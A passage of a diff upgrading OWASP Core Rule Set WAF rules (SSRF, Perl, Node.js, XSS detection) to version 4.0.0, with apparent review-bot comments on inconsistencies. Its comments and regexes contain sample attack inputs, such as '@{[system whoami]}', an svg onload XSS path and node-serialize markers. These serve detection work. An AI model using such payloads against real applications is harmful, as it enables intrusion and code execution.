x80-\xbf]|\x93[\x80-\xa9\xab-\xbf])|\xe3\x80\x82)+))" \ + "id:934120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: URL Parameter using IP 
Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Perl generic RCE signatures ] +# +# Detects Perl-based injection attacks. +# Example: @{[system whoami]} +# +# Regular expression generated from regex-assembly/934140.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934140 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx @\{.*\}" \ + "id:934140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Perl Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-perl',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" 
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+#
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf b/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf
deleted file mode 100644
index a8ab2f379b..0000000000
--- a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf
+++ /dev/null
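Review bot: The 934130 comment says `Stricter sibling: 934131`, but the PL3 section of this new file (between the 934015/934016 and 934017/934018 skip rules) is empty and no 934131 is defined anywhere in the hunk; unless it lives in another file, the reference is dangling and should be removed or the rule added. The 934120 block mixes two generations of tooling: it sends readers to `util/regexp-assemble/data/regexp-934120.data` for the evasion sources a few lines before stating that the regex is generated from `regex-assembly/934120.ra`, and the per-technique sub-patterns it lists (`\d{10}`, `0x[a-f0-9]{8}`, the ihateregex IPv6 form) no longer appear verbatim in the assembled expression, so the old path should go and the list be labelled as the `.ra` inputs rather than the regex itself. 934140's `@rx @\{.*\}` at PL2 will also fire on any `@{…}` sequence in otherwise benign text, e.g. pasted template or Perl snippets in a free-text field; a one-line `# Known FP source: any "@{...}" sequence; add a rule exclusion for affected parameters` under its header would help operators. `PL2 rules adds SSRF capture` should read `PL2 rules add SSRF captures`.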
@@ -1,95 +0,0 @@
-# ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
-# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-#
-# The OWASP ModSecurity Core Rule Set is distributed under
-# Apache Software License (ASL) version 2
-# Please see the enclosed LICENSE file for full details.
-# ------------------------------------------------------------------------
-
-#
-# -= Paranoia Level 0 (empty) =- (apply unconditionally)
-#
-
-
-
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-#
-# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
-#
-
-
-# [ Insecure unserialization / generic RCE signatures ]
-#
-# Libraries performing insecure unserialization:
-# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941)
-# - funcster: __js_function
-#
-# See:
-# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
-# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
-#
-# Some generic snippets used:
-# - function() {
-# - new Function(
-# - eval(
-# - String.fromCharCode(
-#
-# Last two are used by nodejsshell.py,
-# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
-#
-# As base64 is sometimes (but not always) used to encode serialized values,
-# use multiMatch and t:base64decode.
-#
-# Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble.
-# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
-
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \
- "id:934100,\
- phase:2,\
- block,\
- capture,\
- t:none,t:urlDecodeUni,t:base64Decode,\
- msg:'Node.js Injection Attack',\
- logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
- tag:'application-multi',\
- tag:'language-javascript',\
- tag:'platform-multi',\
- tag:'attack-rce',\
- tag:'attack-injection-nodejs',\
- tag:'paranoia-level/1',\
- tag:'OWASP_CRS',\
- tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
- severity:'CRITICAL',\
- multiMatch,\
- setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-
-
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-#
-# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
-#
-
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-#
-# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
-#
-
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
-#
-# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
-#
-
-
-
-#
-# -= Paranoia Levels Finished =-
-#
-SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
index 7f9f807419..150748716c 100644
--- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
@@ -1,8 +1,9 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
+# OWASP CRS ver.4.0.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
-# The OWASP ModSecurity Core Rule Set is distributed under
+# The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
@@ -13,13 +14,55 @@
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 #
-# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
+# In CRS v4.0, we have added REQUEST_FILENAME to the list of variables to
+# be checked for XSS to catch path-based XSS exploits such as:
+# /index.php/%3Csvg/onload=alert()
+#
+# However, the REQUEST_FILENAME is always populated (while ARGS etc. are
+# only set on some requests) and we found that always checking the
+# REQUEST_FILENAME has a significant performance impact.
+# Therefore, we are disabling the REQUEST_FILENAME XSS checks when the
+# REQUEST_FILENAME is clearly not containing special characters necessary
+# for a successful XSS.
+#
+# Some bona-fide REQUEST_FILENAMEs will still contain special characters
+# and will be checked by the rules, but it will be a much lower amount,
+# and that is a trade-off we are willing to make.
+#
+# So, we check for XSS in REQUEST_FILENAME only if it contains
+# other characters than alphanumeric characters, hyphens, underscores etc.
+# typically found in filenames and paths:
+#
+# - ascii 20 (whitespace)
+# - ascii 45-47 (- . /)
+# - ascii 48-57 (0-9)
+# - ascii 65-90 (A-Z)
+# - ascii 95 (underscore)
+# - ascii 97-122 (a-z)
+#
+# If just these characters are present, we make use of a special tag to remove
+# REQUEST_FILENAME from the target list of all the 941xxx rules starting 941100.
+#
+# Please note that it would be preferable to start without REQUEST_FILENAME in the
+# target list and to add it on a case to case base, but the rule language does not
+# support this feature at runtime.
+#
+SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122" \
+ "id:941010,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME"
+
+
 #
 # -=[ Libinjection - XSS Detection ]=-
 #
@@ -32,7 +75,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAf
 # REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|
 # ARGS_NAMES|ARGS|XML:/*
 #
-# 941101: PL2 : REQUEST_HEADERS:Referer
+# 941101: PL2 : REQUEST_FILENAME|REQUEST_HEADERS:Referer
 #
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \
 "id:941100,\
@@ -45,14 +88,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-xss',\
+ tag:'xss-perf-disable',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
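Review bot: The operator list in `SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122"` does not agree with the comment above it: @validateByteRange takes decimal byte values (the ModSecurity reference examples are of the form `10, 13, 32-126`), so `20` is the DC4 control character, whereas the space that the comment line `# - ascii 20 (whitespace)` describes is decimal 32. As far as the byte list shows, the consequence stays within the optimisation this rule implements — a path containing a space keeps REQUEST_FILENAME in the 941xxx target lists, and a path built only from DC4 and the listed characters drops it, and neither case carries the characters the XSS rules look for — but the intent should be pinned down: either change both the operator and the comment to `32`, or keep `20` and reword the comment so it no longer claims to mean whitespace. A one-line comment next to the operator stating that the values are decimal would prevent the same confusion in later edits.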
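Review bot: `tag:'xss-perf-disable'` is added to rule 941100 in the `@@ -45,14 +88,14 @@` hunk, but that rule's target list, the unchanged `SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS"` line in the preceding hunk, does not contain REQUEST_FILENAME; the updated comment puts REQUEST_FILENAME on the PL2 sibling 941101 instead. The `ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME` in 941010 is therefore a no-op for 941100, which is harmless but misleading to a reader who infers the target list from the tag. Either drop the tag on 941100 or add `# tag kept for parity with 941101; 941100 does not inspect REQUEST_FILENAME` next to it. The 941100 action block this hunk belongs to starts outside the hunk.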
@@ -72,51 +115,25 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-xss',\
+ tag:'xss-perf-disable',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
- severity:'CRITICAL',\
- setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-
-
-#
-# -=[ XSS Filters - Category 2 ]=-
-# XSS vectors making use of event handlers like onerror, onload etc, e.g.,
-#
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \
- "id:941120,\
- phase:2,\
- block,\
- capture,\
- t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
- msg:'XSS Filter - Category 2: Event Handler Vector',\
- logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
- tag:'application-multi',\
- tag:'language-multi',\
- tag:'platform-multi',\
- tag:'attack-xss',\
- tag:'paranoia-level/1',\
- tag:'OWASP_CRS',\
- tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
 # -=[ XSS Filters - Category 3 ]=-
 #
-# Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble.
-# To rebuild the regexp:
-# cd util/regexp-assemble
-# ./regexp-assemble.pl regexp-941130.data
+# Regular expression generated from regex-assembly/941130.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 941130
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i).(?:\b(?:x(?:link:href|html|mlns)|data:text/html|formaction|pattern\b.*?=)|!ENTITY[\s\v]+(?:%[\s\v]+)?[^\s\v]+[\s\v]+(?:SYSTEM|PUBLIC)|@import|;base64)\b" \
 "id:941130,\
 phase:2,\
 block,\
@@ -128,40 +145,43 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-xss',\
+ tag:'xss-perf-disable',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
 # -=[ XSS Filters - Category 4 ]=-
 # XSS vectors making use of javascript uri and tags, e.g.,
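Review bot: Rule 941120 (`msg:'XSS Filter - Category 2: Event Handler Vector'`, the generic `on[a-zA-Z]+ … =` pattern) is deleted in the `@@ -72,51 +115,25 @@` hunk and nothing on the new side records where that coverage went; the 941160 regex later in this diff carries an explicit list of handler names, which is only equivalent to the generic form for the handlers on that list. If folding Category 2 into 941160 is the intent, a comment at the Category 3 header such as `# Category 2 (941120, generic event-handler vector) was folded into 941160 in v4.0` keeps the rule numbering auditable and tells operators that an existing 941120 exclusion is now dead. If it is not the intent, the rule should be kept with `ver:'OWASP_CRS/4.0.0'` and the new `tx.inbound_anomaly_score_pl1` variable like its neighbours. The action block this hunk opens in belongs to a rule whose start is outside the hunk.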

+# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#css-expressions-ie7
+# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#behaviors-for-older-modes-of-ie
+# examples: https://regex101.com/r/FFEpsh/1
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[a-z]+=(?:[^:=]+:.+;)*?[^:=]+:url\(javascript" \
 "id:941140,\
 phase:2,\
 block,\
 capture,\
- t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,t:removeWhitespace,\
 msg:'XSS Filter - Category 4: Javascript URI Vector',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-xss',\
+ tag:'xss-perf-disable',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
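Review bot: The new 941140 pattern `(?i)[a-z]+=(?:[^:=]+:.+;)*?[^:=]+:url\(javascript` only matches a style-like `property:url(javascript` declaration, while the unchanged section comment `# XSS vectors making use of javascript uri and tags, e.g.,` and the unchanged `msg:'XSS Filter - Category 4: Javascript URI Vector'` still describe the old, broader pattern that also covered `<object>`/`<embed>`/`<style>`/`<meta>`/`<form>` openings and spaced-out `URL(`…`SCRIPT:`. The added portswigger links about CSS expressions and the new `t:removeWhitespace` suggest the narrowing is deliberate, so the comment should say what the rule now targets and where the tag-based vectors are expected to be caught, for example `# XSS vectors using a javascript: URI inside a CSS url() in an attribute value; tag-based vectors are handled by 941160`. Without that, a reader comparing comment and regex will assume a regression.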
@@ -170,14 +190,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H # # [NoScript InjectionChecker] HTML injection # -# Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-941160.data -# Note that after assemble an ignore case flag (i) is added to the to the Regexp::Assemble output: -# Add ignore case flag between '?' and ':': "(?i:...)" +# Regular expression generated from regex-assembly/941160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941160 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fu
llscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?
\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx 